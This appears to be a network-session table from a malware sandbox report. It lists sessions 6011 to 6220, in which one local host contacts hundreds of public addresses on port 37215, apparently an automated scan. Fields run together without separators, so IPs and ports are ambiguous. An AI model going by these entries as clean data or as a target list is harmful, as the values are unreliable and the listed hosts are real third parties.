                                                  6011192.168.2.1358594157.204.160.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6012192.168.2.1341794157.196.206.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6013192.168.2.1349980197.190.93.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6014192.168.2.135473641.55.232.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6015192.168.2.1354356130.128.96.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6016192.168.2.135797841.152.49.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6017192.168.2.1360496157.244.182.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6018192.168.2.1347556157.197.190.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6019192.168.2.1353380157.11.234.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6020192.168.2.133827069.6.71.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6021192.168.2.1350014197.151.199.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6022192.168.2.135039041.48.254.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6023192.168.2.1337456197.103.197.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6024192.168.2.1354592197.37.141.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6025192.168.2.1360568197.4.54.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6026192.168.2.1340524197.56.215.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6027192.168.2.1353080220.97.249.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6028192.168.2.13471125.156.126.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6029192.168.2.1356452197.245.99.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6030192.168.2.1335434197.21.184.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6031192.168.2.1351950157.46.117.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6032192.168.2.134903641.46.212.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6033192.168.2.1347512157.145.161.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6034192.168.2.1358916197.143.166.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6035192.168.2.1335818197.161.16.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6036192.168.2.135197041.74.140.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6037192.168.2.1356256157.204.116.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6038192.168.2.1342686197.244.191.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6039192.168.2.133989041.74.169.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6040192.168.2.135585067.181.115.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6041192.168.2.1346164197.2.131.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6042192.168.2.1336896162.35.25.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6043192.168.2.1351784197.185.204.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6044192.168.2.1338926105.215.99.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6045192.168.2.1342562197.25.117.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6046192.168.2.1336968157.170.178.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6047192.168.2.1338720197.167.181.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6048192.168.2.134617441.22.69.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6049192.168.2.1338344157.114.208.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6050192.168.2.135276641.10.54.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6051192.168.2.1359846157.210.229.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6052192.168.2.1336052113.128.63.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6053192.168.2.1355912121.13.175.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6054192.168.2.1343064122.231.10.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6055192.168.2.1352796197.209.49.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6056192.168.2.1360536157.209.191.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6057192.168.2.1340364172.117.110.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6058192.168.2.134715641.187.64.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6059192.168.2.133796019.241.32.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6060192.168.2.134105641.12.4.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6061192.168.2.135184865.125.116.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6062192.168.2.134438641.101.166.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6063192.168.2.135876241.51.40.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6064192.168.2.133660241.79.88.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6065192.168.2.133608296.232.144.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6066192.168.2.135907041.161.146.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6067192.168.2.133573874.161.207.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6068192.168.2.1359938202.100.69.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6069192.168.2.134492641.12.164.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6070192.168.2.1342480171.144.38.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6071192.168.2.1333926157.165.36.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6072192.168.2.1345604134.17.209.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6073192.168.2.1338412197.182.239.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6074192.168.2.1348536200.36.14.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6075192.168.2.1356596157.115.35.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6076192.168.2.1337328197.118.189.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6077192.168.2.1335832197.70.8.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6078192.168.2.1347164197.19.236.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6079192.168.2.1348556157.130.33.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6080192.168.2.1355000125.35.28.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6081192.168.2.1336424157.190.236.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6082192.168.2.1344396157.152.213.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6083192.168.2.135717641.1.0.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6084192.168.2.1353364197.7.75.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6085192.168.2.1345050197.186.242.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6086192.168.2.1346046197.222.83.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6087192.168.2.135322441.67.92.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6088192.168.2.133965641.138.167.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6089192.168.2.134906241.245.77.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6090192.168.2.1351394193.211.197.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6091192.168.2.134893841.170.203.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6092192.168.2.1334444114.162.232.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6093192.168.2.133544431.213.135.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6094192.168.2.134386841.185.147.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6095192.168.2.1333114164.26.163.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6096192.168.2.1334622148.38.235.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6097192.168.2.1359740157.203.22.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6098192.168.2.1357836197.160.171.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6099192.168.2.136090298.196.19.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6100192.168.2.134999441.196.39.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6101192.168.2.1334176157.194.183.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6102192.168.2.133483641.216.2.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6103192.168.2.1339580197.199.151.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6104192.168.2.135281041.13.136.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6105192.168.2.1360142197.219.178.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6106192.168.2.133448441.184.99.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6107192.168.2.1360466190.37.47.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6108192.168.2.1338966197.37.119.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6109192.168.2.136032875.69.92.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6110192.168.2.134082641.172.252.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6111192.168.2.1338238177.204.4.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6112192.168.2.135310041.195.71.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6113192.168.2.133291265.228.141.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6114192.168.2.133497494.112.146.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6115192.168.2.133648080.11.75.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6116192.168.2.133933841.129.139.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6117192.168.2.134764441.79.252.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6118192.168.2.1341924197.77.46.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6119192.168.2.1357254157.244.137.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6120192.168.2.1348994157.209.8.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6121192.168.2.135584677.188.9.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6122192.168.2.1341520157.127.239.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6123192.168.2.1336776191.161.156.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6124192.168.2.1340176197.64.53.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6125192.168.2.133938841.30.105.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6126192.168.2.1358896197.77.160.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6127192.168.2.1337404146.157.140.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6128192.168.2.1355804197.20.21.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6129192.168.2.135532841.193.28.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6130192.168.2.1358292206.149.158.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6131192.168.2.1356800121.239.253.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6132192.168.2.1350090107.6.214.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6133192.168.2.1350528157.153.16.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6134192.168.2.1349928197.6.188.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6135192.168.2.133871661.171.13.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6136192.168.2.1334628197.71.119.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6137192.168.2.134517641.118.53.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6138192.168.2.1347608197.158.112.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6139192.168.2.1345324197.76.32.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6140192.168.2.1354596157.165.22.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6141192.168.2.134419841.146.121.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6142192.168.2.1360938197.58.204.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6143192.168.2.134517841.143.241.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6144192.168.2.133332441.19.249.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6145192.168.2.1335444197.79.178.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6146192.168.2.135181441.6.179.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6147192.168.2.1345182197.181.247.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6148192.168.2.1353286157.213.96.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6149192.168.2.1342086140.54.10.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6150192.168.2.1352394197.199.180.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6151192.168.2.134158641.205.9.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6152192.168.2.1347012157.110.108.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6153192.168.2.1348128191.79.8.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6154192.168.2.133575041.248.93.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6155192.168.2.1349116197.158.146.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6156192.168.2.1339650206.188.230.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6157192.168.2.1342098197.190.150.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6158192.168.2.133287465.21.108.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6159192.168.2.134575841.61.170.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6160192.168.2.1348176197.49.127.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6161192.168.2.135004841.85.11.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6162192.168.2.135701641.139.220.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6163192.168.2.133331868.218.211.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6164192.168.2.135608441.105.70.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6165192.168.2.133717641.65.236.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6166192.168.2.134532241.11.67.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6167192.168.2.1341332160.244.10.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6168192.168.2.1353850169.200.183.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6169192.168.2.135471041.212.34.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6170192.168.2.1336936197.227.14.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6171192.168.2.1346852157.46.57.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6172192.168.2.1348466157.211.165.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6173192.168.2.1354846197.56.176.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6174192.168.2.1338816157.217.1.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6175192.168.2.133363641.119.132.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6176192.168.2.1334158157.147.221.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6177192.168.2.1344674197.245.127.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6178192.168.2.134290041.121.15.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6179192.168.2.1345468197.90.73.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6180192.168.2.133385841.148.175.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6181192.168.2.1341968194.109.165.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6182192.168.2.1335440157.23.60.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6183192.168.2.1338160197.49.92.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6184192.168.2.1344048197.27.182.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6185192.168.2.1359956157.175.211.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6186192.168.2.134152870.136.160.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6187192.168.2.134872441.155.193.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6188192.168.2.134188441.198.7.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6189192.168.2.1350464157.40.248.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6190192.168.2.1348156132.108.215.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6191192.168.2.1357884197.90.157.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6192192.168.2.13371128.240.189.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6193192.168.2.133879441.89.50.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6194192.168.2.1349118197.191.80.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6195192.168.2.1355390157.224.88.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6196192.168.2.134440041.252.19.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6197192.168.2.1347766197.36.100.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6198192.168.2.1349778157.155.81.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6199192.168.2.1333900157.158.91.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6200192.168.2.135406042.32.202.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6201192.168.2.1347186190.113.223.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6202192.168.2.1334756197.26.233.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6203192.168.2.1359638157.46.90.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6204192.168.2.1337048102.90.159.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6205192.168.2.1355554197.51.223.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6206192.168.2.1347312157.213.101.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6207192.168.2.1333738197.199.57.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6208192.168.2.134705659.216.232.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6209192.168.2.1341278157.84.198.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6210192.168.2.1341616180.39.209.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6211192.168.2.135731431.117.139.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6212192.168.2.1341794197.196.235.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6213192.168.2.135779641.84.217.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6214192.168.2.1339836157.170.176.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6215192.168.2.1336692197.52.62.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6216192.168.2.1341766157.107.4.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6217192.168.2.1356438197.93.153.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6218192.168.2.1336336197.191.34.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6219192.168.2.136016241.206.149.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6220192.168.2.1345740197.54.237.4737215
